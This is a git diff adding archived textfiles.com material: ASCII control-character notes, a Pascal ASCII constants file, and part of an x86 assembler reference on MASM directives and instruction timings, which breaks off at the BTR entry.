NULL 00 ^@ always ignored -- leader and trailer on paper tape + systems was typically made of sequences of NULLs. + + SOH 01 ^A start of heading -- imagine a heading containing, for + example, the address of the recipient. You could have + relay logic that scans for SOH, then enables the print + mechanism if the following character matches this + station's address. In early documentation, this was + called start of message. + + STX 02 ^B start of text -- if the heading matched, start printing + with the following character. In early documentation, + this was called end of address. + + ETX 03 ^C end of text -- now is a good time to stop printing. + Your message might continue after this with a checksum + or other administrative stuff. In early documentation, + this was called end of message. The common use of + control C as a kill character stems from this -- it + indicates the end of your text addressed to some + application. + + EOT 04 ^D end of transmission -- relay logic could decode this + and, if there is a tape in the tape reader, it could + begin transmitting its own message. + + ENQ 05 ^E enquire -- on receiving this, local relay logic would + generate a response. In early documentation, this was + called WRU or who are you. Teletypes had programmable + response sequences that were encoded on a music box + mechanism, and it was up to the customer to break + plastic fingers off the drum to code how it responded + to an ENQ. + + ACK 06 ^F acknowledge -- one possible response to ENQ. In early + documentation, this was called RU or are you. + + BEL 07 ^G bell -- ring the bell in the terminal. Teletypes had + real bells where most modern terminals have beepers of + some kind. A sequence of BEL characters sent to a + teletype sounded very much like a telephone ringing. + + BS 08 ^H backspace. + + HT 09 ^I horizontal tab. + + LF 0A ^J linefeed. + + VT 0B ^K vertical tab. + + FF 0C ^L formfeed -- page eject. + + CR 0D ^M carrage return -- on many mechanical devices, CR was + slow. The sequence CR LF was always sent in that order + so that the linefeed could be handled while the carriage + was returning; a well adjusted Teletype could just finish + the CR in this time (0.2 seconds), and a common sign that + it was time to call the service man was that the first + letter printed after a CR LF was printed "on the fly" on + the way back to the margin. + + SO 0E ^N shift out -- if you've got a two-color ribbon, shift to + the alternate color, usually red. There are obvious + extensions of this to alternate character sets. + + SI 0F ^O shift in -- undo whatever SO does. For mysterious reasons + that have no apparent connection to old or modern ASCII + standards, DEC liked to use control O as a break character + to suppress teletype output. + + DLE 10 ^P data link escape -- an escape character is generally a + prefix for something else. DLE was expected to be used + as a prefix on characters in the user data stream that + might otherwise be interpreted as data link control + characters, for example, flow control characters. In + some early documentation, this was called DC0 or device + control zero. + + DC1 11 ^Q device control 1 -- turn on the paper tape reader. + In early documentation, this was called XON. + + DC2 12 ^R device control 2 -- turn on the paper tape punch. + + DC3 13 ^S device control 3 -- turn off the paper tape reader. + In early documentation, this was called XOFF, The use + of XON/XOFF (DC1/DC3) for flow control stems from their + use to control the flow of data from the paper tape + reader attached to a Teletype. + + DC4 14 ^T device control 4 -- turn off the paper tape punch. + + NAK 15 ^U negative acknowledge -- another possible response to ENQ. + One flow control mechanism is to use ENQ to ask if the + receiver has buffer space, and require the receiver to + respond with either ACK (yes) or NAK (no). ENQ could + also be used to enquire about whether a retransmission + is required after sending a checksum. The popular use of + control U to delete the current input line is only vaguely + grounded in this definition. + + SYN 16 ^V synchronous idle -- if you're using a synchronous + transmission protocol, and you have no data to send, you + send SYN characters to keep the clocks synchronized. + The receiver should ignore these, and the transmitter may + have to insert them into the data stream once in a while. + + ETB 17 ^W end of transmission block -- used when a transmission must + be broken into many blocks for some reason, for example, + to place a checksum after each block. Early documentation + called this logical end of media. + + CAN 18 ^X cancel -- take that back, what I just sent you is a + mistake, ignore it. + + EM 19 ^Y end of medium -- there's nothing left on this reel of + (paper) tape. + + SUB 1A ^Z substitute -- the next character is from an alternate + character set. SUB X might be equivalent to SO X SI, + or it might be an alternate mechanism for extending the + character set. The common use of control Z as an end + of file character has no obvious relation to the standard. + + ESC 1B ^[ escape -- the next character is to be interpreted as + something other than text, for example, it might be an + extended control character of some kind. + + FS 1C ^\ file separator -- useful if you have multiple logical + files in one transmission. + + GS 1D ^] group separator -- useful if files are made of groups + of records. + + RS 1E ^^ record separator -- COBOL anyone? + + US 1F ^_ unit separator -- are records made of units? + + ALT 7D } Some early teletypes had an ALT MODE key that generated + this code instead of ESC. This was interpreted as an + escape code, which was no problem when nobody had lower + case printers, but with the advent of full 96 character + ASCII, there were obvious compatability problems. + + PRE 7E ~ A few terminals had a PREFIX key that generated this code + instead of ALT MODE, with all the same problems. + + DEL 7F delete -- remember, paper tape uses a hole to record each + one and no hole to record each zero. DEL is all holes, + so it can be punched over any other character to rub it + out (on old teletypes, it was the RUB or RUB OUT key). + If you mispunch a character, just back up the tape and + overpunch it with a DEL. Software is expected to ignore + DEL the same way it ignores NULL. + diff --git a/textfiles.com/computers/ascii.inc b/textfiles.com/computers/ascii.inc new file mode 100644 index 00000000..127d46ff --- /dev/null +++ b/textfiles.com/computers/ascii.inc @@ -0,0 +1,26 @@ +(*----------------------------------------------------------------------*) +(* ASCII character set definitions *) +(*----------------------------------------------------------------------*) + +const + NUL = 0; (* NULL Character *) + ETX = 3; (* ETX = ^C *) + ENQ = 5; (* ENQ Character *) + ACK = 6; + BELL = 7; (* BELL Character *) + BS = 8; (* Backspace Char *) + HT = 9; (* Horizontal Tab *) + LF = 10; (* Line Feed *) + VT = 11; (* Vertical Tab *) + FF = 12; (* Form Feed *) + CR = 13; (* Carriage Return *) + SO = 14; (* Start grahics *) + SI = 15; (* End graphics *) + XON = 17; (* XON Character *) + XOFF = 19; (* XOFF Character *) + CAN = 24; + SUB = 26; (* EOF Character *) + ESC = 27; (* Escape *) + SP = 32; (* Space *) + DEL = 127; (* DEL Character *) + diff --git a/textfiles.com/computers/asm.txt b/textfiles.com/computers/asm.txt new file mode 100644 index 00000000..22ed2a7d --- /dev/null +++ b/textfiles.com/computers/asm.txt @@ -0,0 +1,4138 @@ +@Assembler Programming Topics +:8086 architecture +^Intel 8086 Family Architecture + +% General Purpose Registers Segment Registers + + AH/AL AX (EAX) Accumulator CS Code Segment + BH/BL BX (EBX) Base DS Data Segment + CH/CL CX (ECX) Counter SS Stack Segment + DH/DL DX (EDX) Data ES Extra Segment + (FS) 386 and newer + (Exx) indicates 386+ 32 bit register (GS) 386 and newer + + +% Pointer Registers Stack Registers + + SI (ESI) Source Index SP (ESP) Stack Pointer + DI (EDI) Destination Index BP (EBP) Base Pointer + IP Instruction Pointer + +% Status Registers + + FLAGS Status Flags (see ~FLAGS~) + +% Special Registers (386+ only) + + CR0 Control Register 0 DR0 Debug Register 0 + CR2 Control Register 2 DR1 Debug Register 1 + CR3 Control Register 3 DR2 Debug Register 2 + DR3 Debug Register 3 + TR4 Test Register 4 DR6 Debug Register 6 + TR5 Test Register 5 DR7 Debug Register 7 + TR6 Test Register 6 + TR7 Test Register 7 + +% Register Default Segment Valid Overrides + + BP SS DS, ES, CS + SI or DI DS ES, SS, CS + DI strings ES None + SI strings DS ES, SS, CS + + + - see ~CPU~ ~DETECTING~ ~Instruction Timing~ + +:Instruction Timing +^Instruction Clock Cycle Calculation + + + Some instructions require additional clock cycles due to a "Next + Instruction Component" identified by a "+m" in the instruction + clock cycle listings. This is due to the prefetch queue being + purge on a control transfers. Below is the general rule for + calculating "m": + + + 88/86 not applicable + 286 "m" is the number of bytes in the next instruction + 386 "m" is the number of components in the next instruction + (the instruction coding (each byte), plus the data and + the displacement are all considered components) + + +^8088/8086 Effective Address (EA) Calculation + +% Description Clock Cycles + + Displacement 6 + Base or Index (BX,BP,SI,DI) 5 + Displacement+(Base or Index) 9 + Base+Index (BP+DI,BX+SI) 7 + Base+Index (BP+SI,BX+DI) 8 + Base+Index+Displacement (BP+DI,BX+SI) 11 + Base+Index+Displacement (BP+SI+disp,BX+DI+disp) 12 + + + - add 4 cycles for word operands at odd addresses + - add 2 cycles for segment override + - 80188/80186 timings differ from those of the 8088/8086/80286 + + +% Task State Calculation + + "TS" is defined as switching from VM/486 or 80286 TSS to one of + the following: + + ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ + ³ New Task ³ + ÃÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄ´ + ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´486 TSS³486 TSS³386 TSS³386 TSS³286 TSS³ + ³ Old Task ³ (VM=0)³ (VM=1)³ (VM=0)³ (VM=1)³ ³ + ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄ´ + 386 TSS (VM=0) ³ ³ ³ 309 ³ 226 ³ 282 ³ + ÃÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄ´ + 386 TSS (VM=1) ³ ³ ³ 314 ³ 231 ³ 287 ³ + ÃÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄ´ + 386 CPU/286 TSS ³ ³ ³ 307 ³ 224 ³ 280 ³ + ÃÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄ´ + 486 CPU/286 TSS ³ 199 ³ 177 ³ ³ ³ 180 ³ + ÀÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÙ + + +% Miscellaneous + + - all timings are for best case and do not take into account wait + states, instruction alignment, the state of the prefetch queue, + DMA refresh cycles, cache hits/misses or exception processing. + - to convert clocks to nanoseconds divide one microsecond by the + processor speed in MegaHertz: + +^(1000MHz/(n MHz)) = X nanoseconds + + + - see ~8086 Architecture~ + +:directives:asm directives +^Macro Assembler Directives + +^Processor Code Generation Directives + + .186 enables assembly of 80186 instructions + .286 enables assembly of non privileged 80286 instructions + .286C same as .286 + .286P enables assembly of all 80286 instructions + .287 enabled assembly of 80287 instructions + .386 enabled assembly of non privileged 80386 instructions + If used before .MODEL segments are defined as 32bits. + Causes all segments to default to DWORD alignment. + .386P enabled assembly of all 80386 instructions (see .386) + .387 enabled assembly of 80387 instructions + .8086 default, enables assembly of 8088/8086 instruction + .8087 default, enables assembly of 8087 instructions + + + These directives must precede the segment they are to effect. + they cannot occur within a segment. + + +^Memory Model Directives + + .CODE [name] starts code segment; must follow .MODEL directive + .CONST starts a constant data segment with name CONST; + must follow .MODEL directive; placed in DGROUP + .DATA starts a near data segment for initialized data + with name _DATA; must follow .MODEL directive; + placed in DGROUP + .DATA? starts a near data segment for uninitialized + data with name _BSS; must follow .MODEL + directive; placed in DGROUP + .FARDATA [name] not placed in any group + .FARDATA? [name] not placed in any group + .MODEL model defines memory model to be one of the following: + SMALL, COMPACT, MEDIUM, LARGE or HUGE; must be + used prior to any other segment directive + .STACK [size] indicates start of stack segment named 'STACK' + with size indicating number of bytes to reserve, + default is 1k; placed in DGROUP + + +^Segment Definition, Segment Ordering and Linkage Directives + + .ALPHA orders segments alphabetically + .SEQ orders segments sequentially (default) + ASSUME sreg:name [,sreg:name...] selects default segment + register to be used by the assembler, not the CPU, + for addressing all symbols in the segment or group. + Name must be associated with a SEGMENT or GROUP + or set to "NOTHING" to indicate no segment register + is to be associated. + COMM def [,def...] defines variables that are both public and + external (communal). Can be used in and include + file to identify it to each source file without + declaring it in each model as extern. Actually + defines data once. Communal variables cannot be + initialized, and are not guaranteed to be allocated + contiguously since these are allocated by the linker. + DOSSEG orders segments the same as DOS. This is Microsoft + languages default order; causes paragph alignment + END [name] marks end of source module and sets program + start address (CS:IP) if 'name' is present + name ENDP ends procedure 'name' + name ENDS ends a segment or structure + EXTRN name:type [,name:type...] defines one or more external symbols + name GROUP seg[,seg] + name LABEL [NEAR|FAR|PROC] defines an entry point; If PROC is specified, + it's value depends on the current MODEL + NAME pgmName ignored since MASM 5.0; used to set module name + name PROC [NEAR|FAR] defines procedure; NEAR/FAR has .MODEL default + PUBLIC name[,name...] makes symbol 'name' available to other modules + name SEGMENT [align][combine][use]['class'] + align = BYTE align on byte address (no alignment) + = WORD align on even address + = DWORD align on DWORD address + = PARA align on next 16 byte paragraph + = PAGE align on next 256 byte boundary + combine = PUBLIC similar named segments are concatenated (CS) + = STACK similar named segments are concatenated (SS) + = COMMON similar named segment are overlapped + = MEMORY similar names segments are concatenated + = AT addr segment relative to absolute address + = nothing segment is private and loaded independent + use = USE16 segments will be 16 bits (if .386) + = USE32 segments will be 32 bits (if .386) + + +^Data Allocation Directives + + ALIGN n aligns next variable or instruction on a boundary + that is a multiple of "n". This can speed memory + fetches on 16 and 32 bit CPU'S if aligned. New to + ~MASM~ 5.0, previous versions used EVEN. Can result + in NOP's added to code. + [name] DB init[,init...] define byte + [name] DD init[,init...] define double word (DWORD, 4 bytes) + [name] DF init[,init...] define far word (FWORD, 386, 6 bytes) + [name] DQ init[,init...] define quad word (QWORD, 8 bytes) + [name] DT init[,init...] define temp word (TBYTE, 10 bytes) + [name] DW init[,init...] define word (WORD, 2 bytes) + count DUP (init[,init...]) duplicate 'init' 'count' times; DUP can be + nested to 17 levels; DUP'ed initial values + of (?) don't result in data in the object file + but instead increment the next data addr + name ENDS end of structure or segment + EVEN same as align 2; Aligns data on even boundary + ORG expr sets location counter to 'expr'; If 'expr' + is '$' the code is ORG'ed at the current loc. + name RECORD fld[,fld...] defines a byte or word variable + consisting of bit fields; fields have the format: + fieldname:width[=expr]; the sum of all widths + must be <= 0 + [name] STRUC <[init[,init]]> defines beginning of a structure; Values + between <> are initializers; The '<>' symbols + are required. + + +^Logical and Bit Oriented Directives + + expr1 AND expr2 returns nonzero if any set bit matches + expr1 EQ expr2 returns (-1) for true or (0) for false + expr1 GE expr2 returns (-1) for true or (0) for false + expr1 LE expr2 returns (-1) for true or (0) for false + expr1 LT expr2 returns (-1) for true or (0) for false + MASK {fldname|record} returns bit mask for bits in record + expr1 OR expr2 returns bitwise OR on expr1 and expr2 + NOT expr returns 'expr' with all bits reversed + expr SHL count returns expr shifted left count times + expr SHR count returns expr shifted right count times + WIDTH {fldname|record} returns width of field in bit record + expr1 XOR expr2 returns bitwise XOR on expr1 and expr2 + + +^Other Operators and Directives + + [] index operator, same as addition + .MSFLOAT encode floats in Microsoft Real Format + .TYPE expr returns byte defining mode and scope of expr + name EQU expr assigns expression to name. surround text with <> + HIGH expr returns high byte of 'expr' + INCLUDE filespec inserts code from 'filespec' into file + INCLUDELIB filespec stores link library info in .OBJ file + LENGTH var returns number of data objects in DUPed 'var' + LOW expr returns low byte of 'expr' + expr1 MOD expr2 return remainder of expr1/expr2 + OFFSET expr returns offset of expr; When .MODEL is used + the offset of a group relative segment refers + to the end of the segment + type PTR expr forces 'expr' to 'type' + SEG expr returns segment of expression + SHORT sets type of label to short, less than 128 + bytes from start of next instruction + SIZE var returns # of bytes allocated by DUP directive + THIS type returns an operand of specified type whose + offset and segment values are equal to the + current location + TYPE expr returns type of expression + + +% Program Listing and Documentation Directives + + .CREF restores listing of cross reference symbols + .LALL include macro expansion in listings + .LFCOND include false conditional blocks in listings + .LIST starts listing of statements + .SALL suppress listing of all macro expansions + .SFCOND suppress false conditional blocks in listings + .XALL start listing of macro expansion + .XCREF [name[,name...]] suppress symbols in cross reference + .XLIST suppress program listing + COMMENT delimiter [text] + PAGE [[len],wid] sets page length&width or ejects if no parms + SUBTTL text defines program listing subtitle + TITLE text defines program listing title + + +% Condition Assembly Directives + + ELSE else clause for conditional assembly block + ENDIF terminates a conditional assembly block + IFDEF name conditional assembly if name is defined + + +% Macro Definition Directives + + ENDM terminates a macro block + EXITM exit macro expansion immediately + IRP parm, parm in the statements enclosed by the + IRP and ENDM will be repeated and replaced with the + values of "arg" for each "arg" in the <>. + IRPC parm, parm in the statements enclosed by the IRPC + and ENDM will be repeated and replaced with the values + of each char in the "string" for each character + position in the string. "string" should be enclosed + in <> if it contains spaces or other separators. + LOCAL name[,name...] defines scope symbol as local to a macro + name MACRO [parm[,parm...]] defines a macro and it's parameters + PURGE name[,name] purges macros from memory + REPT expr repeats all statements through ENDM statement for + 'expr' times + + +% User Message Directives + + .ERR generates and error + .ERR1 generates an error on PASS 1 + .ERR2 generates an error on PASS 2 + .ERRB generates an error if 'arg' is blank + .ERRDEF name generates an error if 'name' is previously defined + .ERRDIF[I] , + .ERRE expr generates and error is 'expr' is false + %OUT text displays 'text' to console + + +% Predefined Equates (available only if simplified segments are used) + + @curseg contains the current segment + @filename current file name without extension + @code contains the current code segment + @codesize 0 for small & compact, 1 for large, medium & huge + @datasize 0 for small & medium, 1 for compact & large, 2=huge + @const contains segment of define by .CONST + @data contains segment of define by .DATA + @data? contains segment of define by .DATA? + @fardata contains segment of define by .FARDATA + @fardata? contains segment of define by .FARDATA? + @stack contains segment of define by .STACK + + Most of these are only available if the simplified segment system + is used. @curseg and @filename are available regardless. + + +% Radix Specifiers + + .RADIX expr sets radix [2..16] for numbers (dec. default) + B binary data specifier + Q octal data specifier + O octal data specifier + D decimal data specifier + H hexadecimal data specifier + + +:masm options:assembler options +^Microsoft Assembler Command Line Options + +^MASM [options] srcfile[,[objfile][,[lstfile][,[xreffile]]]][;] + +% Options Definition + /A generate segments in alphabetical order + /B[size] sets I/O buffer size in K bytes (1..63, default 32) + /C generate cross reference file with .CRF extension + /D generate PASS 1 listing + /Dsym[=val] define symbol for use during assembly + /E emulate floating point instructions (for use with HLL) + /H list options and command syntax + /Ipath include-file search path + /L generate listing file with .LST extension + /ML case sensitive for all symbols + /MU upper case all symbols (default) + /MX case sensitive in external and public symbols + /N suppress symbol tables in listings + /P check for impure code in 286 and 386 protected + mode (invalid CS overrides) + /S generate segments in the order they are found (default) + /T terse message display; display errors only + /V verbose message display; includes # lines and symbols + /W{0|1|2} assembly warning level + 0 = no warnings + 1 = severe warnings only + 2 = all warnings enabled + /X display complete conditional assembly blocks in + listing including false conditionals + /Z display errors including line numbers to screen + /ZD generate line numbers in .OBJ files + /ZI generate both symbolic and line number information in + .OBJ files + +% Environment Variables + + INCLUDE search path for include files + MASM default command line options +:flags register:8086 flags +^FLAGS - Intel 8086 Family Flags Register + + ³11³10³F³E³D³C³B³A³9³8³7³6³5³4³3³2³1³0³ + ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄ CF Carry Flag + ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄ 1 + ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄ PF Parity Flag + ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄ 0 + ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄ AF Auxiliary Flag + ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄ 0 + ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄ ZF Zero Flag + ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄ SF Sign Flag + ³ ³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄ TF Trap Flag (Single Step) + ³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄ IF Interrupt Flag + ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄ DF Direction Flag + ³ ³ ³ ³ ³ ³ ÀÄÄÄ OF Overflow flag + ³ ³ ³ ³ ÀÄÁÄÄÄ IOPL I/O Privilege Level (286+ only) + ³ ³ ³ ÀÄÄÄÄÄ NT Nested Task Flag (286+ only) + ³ ³ ÀÄÄÄÄÄ 0 + ³ ÀÄÄÄÄÄ RF Resume Flag (386+ only) + ÀÄÄÄÄÄÄ VM Virtual Mode Flag (386+ only) + + - see ~PUSHF~ ~POPF~ ~STI~ ~CLI~ ~STD~ ~CLD~ +:models:segment names +^Memory Model Programming & Segment Information + +% Model + TINY Data and code fit in one 64K segment. All code and + data are accessed via near pointers. + SMALL 64k data segment max and 64k code segment max. All + code and data are accessed via near pointers. + COMPACT 1Mb data segment max and 64K code segment max. Code + is accessed via near pointers, data is accessed via + far pointers. No array can be greater than 64K + MEDIUM 64K data segment max and 1Mb code segment max. Code is + accessed via far pointers, data is accessed via near pointers. + LARGE 1Mb data segment max and 1Mb code segment max. All + code and data are accessed via far pointers. No + single element can be greater than 64K. + HUGE 1Mb data segment max and 1Mb code segment max. All + code and data are accessed via far pointers. This is + the only model where arrays can be larger than 64K. + In this mode is C will normalize all data pointers + to avoid segment wrapping. + +^Small Memory Model + +% Directive Segment Alignment Combine Class + .CODE _TEXT WORD PUBLIC 'CODE' + .DATA _DATA WORD PUBLIC 'DATA' + .CONST CONST WORD PUBLIC 'CONST' + .DATA? _BSS WORD PUBLIC 'BSS' + .STACK STACK PARA STACK 'STACK' + + +^Compact Memory Model + +% Directive Segment Alignment Combine Class + .CODE _TEXT WORD PUBLIC 'CODE' + .FARDATA FAR_DATA PARA private 'FAR_DATA' + .FARDATA? FAR_BSS PARA private 'FAR_BSS' + .DATA _DATA WORD PUBLIC 'DATA' + .CONST CONST WORD PUBLIC 'CONST' + .DATA? _BSS WORD PUBLIC 'BSS' + .STACK STACK PARA STACK 'STACK' + + +^Medium Memory Model + +% Directive Segment Alignment Combine Class + .CODE name_TEXT WORD PUBLIC 'CODE' + .DATA _DATA WORD PUBLIC 'DATA' + .CONST CONST WORD PUBLIC 'CONST' + .DATA? _BSS WORD PUBLIC 'BSS' + .STACK STACK PARA STACK 'STACK' + + +^Large or Huge Memory Models + +% Directive Segment Alignment Combine Class + .CODE name_TEXT WORD PUBLIC 'CODE' + .FARDATA FAR_DATA PARA private 'FAR_DATA' + .FARDATA? FAR_BSS PARA private 'FAR_BSS' + .DATA _DATA WORD PUBLIC 'DATA' + .CONST CONST WORD PUBLIC 'CONST' + .DATA? _BSS WORD PUBLIC 'BSS' + .STACK STACK PARA STACK 'STACK' + + + - all segments fall into DGROUP except for ???_TEXT, FAR_DATA + and FAR_BSS + - see ~MASM DIRECTIVES~ +:msw:machine status word +^MSW - Machine Status Word (286+ only) + + + ³31³30-5³4³3³2³1³0³ Machine Status Word + ³ ³ ³ ³ ³ ³ ÀÄÄÄÄ Protection Enable (PE) + ³ ³ ³ ³ ³ ÀÄÄÄÄÄ Math Present (MP) + ³ ³ ³ ³ ÀÄÄÄÄÄÄ Emulation (EM) + ³ ³ ³ ÀÄÄÄÄÄÄÄ Task Switched (TS) + ³ ³ ÀÄÄÄÄÄÄÄÄ Extension Type (ET) + ³ ÀÄÄÄÄÄÄÄÄÄÄ Reserved + ÀÄÄÄÄÄÄÄÄÄÄÄÄÄ Paging (PG) + + + Bit 0 PE Protection Enable, switches processor between + protected and real mode + Bit 1 MP Math Present, controls function of the ~WAIT~ + instruction + Bit 2 EM Emulation, indicates whether coprocessor functions + are to be emulated + Bit 3 TS Task Switched, set and interrogated by coprocessor + on task switches and when interpretting coprocessor + instructions + Bit 4 ET Extension Type, indicates type of coprocessor in + system + Bits 5-30 Reserved + bit 31 PG Paging, indicates whether the processor uses page + tables to translate linear addresses to physical + addresses + + - see ~SMSW~ ~LMSW~ +:aaa +^AAA - Ascii Adjust for Addition + + + Usage: AAA + Modifies flags: AF CF (OF,PF,SF,ZF undefined) + + + Changes contents of AL to valid unpacked decimal. The high order + nibble is zeroed. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 8 3 4 3 1 + + + - see ~Instruction Timing~ + +:aad +^AAD - Ascii Adjust for Division + + + Usage: AAD + Modifies flags: SF ZF PF (AF,CF,OF undefined) + + + Used before dividing unpacked decimal numbers. Multiplies AH by + 10 and the adds result into AL. Sets AH to zero. This instruction + is also known to have an undocumented behavior. + + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 60 14 19 14 2 + + - see ~Instruction Timing~ + +:aam +^AAM - Ascii Adjust for Multiplication + + + Usage: AAM + Modifies flags: PF SF ZF (AF,CF,OF undefined) + + + Used after multiplication of two unpacked decimal numbers, this + instruction adjusts an unpacked decimal number. The high order + nibble of each byte must be zeroed before using this instruction. + This instruction is also known to have an undocumented behavior. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 83 16 17 15 2 + + + - see ~Instruction Timing~ + +:aas +^AAS - Ascii Adjust for Subtraction + + + Usage: AAS + Modifies flags: AF CF (OF,PF,SF,ZF undefined) + + + Corrects result of a previous unpacked decimal subtraction in AL. + High order nibble is zeroed. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 8 3 4 3 1 + + + - see ~Instruction Timing~ + +:adc +^ADC - Add With Carry + + Usage: ADC dest,src + Modifies flags: AF CF OF SF PF ZF + + + Sums two binary operands placing the result in the destination. + If CF is set, a 1 is added to the destination. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg 3 2 2 1 2 + mem,reg 16+EA 7 7 3 2-4 (W88=24+EA) + reg,mem 9+EA 7 6 2 2-4 (W88=13+EA) + reg,immed 4 3 2 1 3-4 + mem,immed 17+EA 7 7 3 3-6 (W88=23+EA) + accum,immed 4 3 2 1 2-3 + + + - see ~Instruction Timing~ + +:add +^ADD - Arithmetic Addition + + Usage: ADD dest,src + Modifies flags: AF CF OF PF SF ZF + + + Adds "src" to "dest" and replacing the original contents of "dest". + Both operands are binary. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg 3 2 2 1 2 + mem,reg 16+EA 7 7 3 2-4 (W88=24+EA) + reg,mem 9+EA 7 6 2 2-4 (W88=13+EA) + reg,immed 4 3 2 1 3-4 + mem,immed 17+EA 7 7 3 3-6 (W88=23+EA) + accum,immed 4 3 2 1 2-3 + + + - see ~Instruction Timing~ + +:and +^AND - Logical And + + Usage: AND dest,src + Modifies flags: CF OF PF SF ZF (AF undefined) + + + Performs a logical AND of the two operands replacing the destination + with the result. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg 3 2 2 1 2 + mem,reg 16+EA 7 7 3 2-4 (W88=24+EA) + reg,mem 9+EA 7 6 1 2-4 (W88=13+EA) + reg,immed 4 3 2 1 3-4 + mem,immed 17+EA 7 7 3 3-6 (W88=23+EA) + accum,immed 4 3 2 1 2-3 + + + - see ~Instruction Timing~ + +:arpl +^ARPL - Adjusted Requested Privilege Level of Selector +^(286+ protected mode) + + + Usage: ARPL dest,src + Modifies flags: ZF + + + Compares the RPL bits of "dest" against "src". If the RPL bits + of "dest" are less than "src", the destination RPL bits are set + equal to the source RPL bits and the Zero Flag is set. Otherwise + the Zero Flag is cleared. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg - 10 20 9 2 + mem,reg - 11 21 9 4 + + + - see ~Instruction Timing~ + +:bound +^BOUND - Array Index Bound Check (80188+) + + + Usage: BOUND src,limit + Modifies flags: None + + + Array index in source register is checked against upper and lower + bounds in memory source. The first word located at "limit" is + the lower boundary and the word at "limit+2" is the upper array bound. + Interrupt 5 occurs if the source value is less than or higher than + the source. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16,mem32 - nj=13 nj=10 7 2 + reg32,mem64 - nj=13 nj=10 7 2 + + - nj = no jump taken + - see ~Instruction Timing~ + +:bsf +^BSF - Bit Scan Forward (386+ only) + + + Usage: BSF dest,src + Modifies flags: ZF + + + Scans source operand for first bit set. Sets ZF if a bit is found + set and loads the destination with an index to first set bit. Clears + ZF is no bits are found set. BSF scans forward across bit pattern + (0-n) while BSR scans in reverse (n-0). + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg - - 10+3n 6-42 3 + reg,mem - - 10+3n 7-43 3-7 + reg32,reg32 - - 10+3n 6-42 3-7 + reg32,mem32 - - 10+3n 7-43 3-7 + + + - see ~Instruction Timing~ + +:bsr +^BSR - Bit Scan Reverse (386+ only) + + + Usage: BSR dest,src + Modifies flags: ZF + + + Scans source operand for first bit set. Sets ZF if a bit is found + set and loads the destination with an index to first set bit. Clears + ZF is no bits are found set. BSF scans forward across bit pattern + (0-n) while BSR scans in reverse (n-0). + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg - - 10+3n 6-103 3 + reg,mem - - 10+3n 7-104 3-7 + reg32,reg32 - - 10+3n 6-103 3-7 + reg32,mem32 - - 10+3n 7-104 3-7 + + + - see ~Instruction Timing~ + +:bswap +^BSWAP - Byte Swap (486+ only) + + + Usage: BSWAP reg32 + Modifies flags: none + + + Changes the byte order of a 32 bit register from big endian to + little endian or vice versa. Result left in destination register + is undefined if the operand is a 16 bit register. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg32 - - - 1 2 + + + - see ~Instruction Timing~ + +:bt +^BT - Bit Test (386+ only) + + + Usage: BT dest,src + Modifies flags: CF + + + The destination bit indexed by the source value is copied into the + Carry Flag. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16,immed8 - - 3 3 4-8 + mem16,immed8 - - 6 6 4-8 + reg16,reg16 - - 3 3 3-7 + mem16,reg16 - - 12 12 3-7 + + + - see ~Instruction Timing~ + +:btc +^BTC - Bit Test with Compliment (386+ only) + + + Usage: BTC dest,src + Modifies flags: CF + + + The destination bit indexed by the source value is copied into the + Carry Flag after being complimented (inverted). + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16,immed8 - - 6 6 4-8 + mem16,immed8 - - 8 8 4-8 + reg16,reg16 - - 6 6 3-7 + mem16,reg16 - - 13 13 3-7 + + + - see ~Instruction Timing~ + +:btr +^BTR - Bit Test with Reset (386+ only) + + + Usage: BTR dest,src + Modifies flags: CF + + + The destination bit indexed by the source value is copied into the + Carry Flag and then cleared in the destination. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16,immed8 - - 